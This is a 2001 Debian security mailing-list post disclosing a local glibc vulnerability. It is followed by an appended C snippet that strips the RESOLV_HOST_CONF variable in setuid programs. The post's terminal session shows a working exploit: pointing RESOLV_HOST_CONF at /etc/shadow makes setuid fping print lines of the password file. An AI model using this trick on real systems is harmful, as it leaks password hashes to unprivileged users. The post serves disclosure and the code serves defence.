Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Since I've not had any response yet, I thought I'd give a demonstration of how
nasty this is:
Script started on Mon Jan 8 17:48:23 2001
thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
thomas@io:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
--- localhost ping statistics ---
2 packets transmitted, 0 packets received, 100% packet loss
thomas@io:~$ fping localhost
/etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
[snip]
/etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
localhost is unreachable
thomas@io:~$ ls -l `which fping`
-rwsr-xr-x 1 root root 19728 May 15 2000 /usr/bin/fping
thomas@io:~$ ls -l `which ping`
-rwsr-xr-x 1 root root 15036 Dec 31 04:11 /bin/ping
thomas@io:~$ ldd `which fping`
libc.so.6 => /lib/libc.so.6 (0x40021000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
thomas@io:~$ ldd `which ping`
libc.so.6 => /lib/libc.so.6 (0x40021000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
thomas@io:~$ exit
Script done on Mon Jan 8 17:49:42 2001
It seems to work for some setuid programs, but not others. I'm running the
most recent packages from unstable as of today:
ii libc6 2.2-9 GNU C Library: Shared libraries and Timezone
ii netkit-ping 0.10-5 The ping utility from netkit
ii fping 2.2b1-2 Send ICMP ECHO_REQUEST packets to network ho
cheers,
Thomas
On Mon, 8 Jan 2001, thomas lakofski wrote:
> From: thomas lakofski <thomas@88.net>
> To: security@debian.org, debian-security@lists.debian.org
> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>
> Hi,
>
> A friend of mine just tried this against my unstable box and successfully
> obtained the contents of /etc/shadow.
>
> I imagine that this is a problem in libc -- I'll leave it to
> security@debian.org to file bug reports.
>
> cheers,
>
> Thomas
>
>
--
who's watching your watchmen?
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4 F053 4AE5 01DF 81FD 4B43
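
An added example, not part of the original message and not glibc's own code: one way a setuid program or library can refuse the RESOLV_HOST_CONF override shown in the session above when real and effective IDs differ, and drop the variable from an environment before passing it on. The function names and the one-entry denylist are hypothetical; /etc/host.conf is the resolver's default path.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Default resolver config path that RESOLV_HOST_CONF would override. */
#define DEFAULT_HOST_CONF "/etc/host.conf"

/* Hypothetical one-entry denylist for this example. */
static const char *const unsafe_vars[] = { "RESOLV_HOST_CONF", NULL };

/* True when the process has more privilege than its invoker (setuid/setgid). */
int running_privileged(void) {
    return getuid() != geteuid() || getgid() != getegid();
}

/* Honour the environment override only for unprivileged callers. */
const char *host_conf_path(const char *override, int privileged) {
    if (privileged || override == NULL || *override == '\0')
        return DEFAULT_HOST_CONF;
    return override;
}

/* Drop denylisted NAME=value entries from envp in place; returns the count. */
int scrub_env(char **envp) {
    int dropped = 0;
    char **out = envp;
    for (char **in = envp; *in != NULL; in++) {
        int bad = 0;
        for (size_t i = 0; unsafe_vars[i] != NULL; i++) {
            size_t n = strlen(unsafe_vars[i]);
            /* Match the whole name, so RESOLV_HOST_CONF_X is left alone. */
            if (strncmp(*in, unsafe_vars[i], n) == 0 && (*in)[n] == '=')
                bad = 1;
        }
        if (bad)
            dropped++;
        else
            *out++ = *in;
    }
    *out = NULL;
    return dropped;
}

int main(void) {
    int priv = running_privileged();
    printf("privileged=%d host.conf=%s\n", priv, host_conf_path(getenv("RESOLV_HOST_CONF"), priv));
    return 0;
}
```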